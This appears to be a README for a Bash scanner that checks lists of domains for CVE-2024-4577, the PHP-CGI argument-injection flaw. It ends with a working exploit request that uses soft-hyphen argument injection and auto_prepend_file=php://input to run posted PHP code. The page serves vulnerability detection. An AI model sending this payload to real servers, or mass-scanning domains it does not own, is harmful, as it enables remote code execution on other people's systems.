This script is designed to check for the vulnerability described by CVE-2024-4577, which involves exploiting certain PHP configurations to execute arbitrary code remotely. It sends a POST request to specified endpoints on a list of domains and checks if the response indicates vulnerability.
-
Install GNU Parallel:
sudo apt-get install parallel
-
Clone the Repository: Clone this repository to your local machine using Git:
git clone https://github.com/Yukiioz/CVE-2024-4577.git
-
Navigate to the Repository: Change into the cloned directory:
cd CVE-2024-4577 -
Prepare Domain List: Create a text file containing a list of domains to check. Each domain should be on a new line. For example:
https://example1.com https://example2.com https://example3.com -
Run the Script: Execute the script
CVE-2024-4577.sh, passing the path to the domain list file as an argument:./CVE-2024-4577.sh live-subdomains.txt | tee script.log -
Review Output: The script will display progress information as it checks each domain. If a domain is found to be vulnerable, it will be highlighted in red. The script will also export a list of vulnerable domains to a file named
vulnerable_domains.txt.
The script exports a list of vulnerable domains to a file named vulnerable_domains.txt. This file contains a simple list of vulnerable domains, with each domain on a new line. To further manually confirm, use the curl command to send a POST request to the target endpoint on the domain. Replace https://dev.example.com/test.php with the actual endpoint on the target domain.
curl -X POST https://dev.example.com/test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input \
-H "User-Agent: curl/8.3.0" \
--data "<?php phpinfo(); ?>"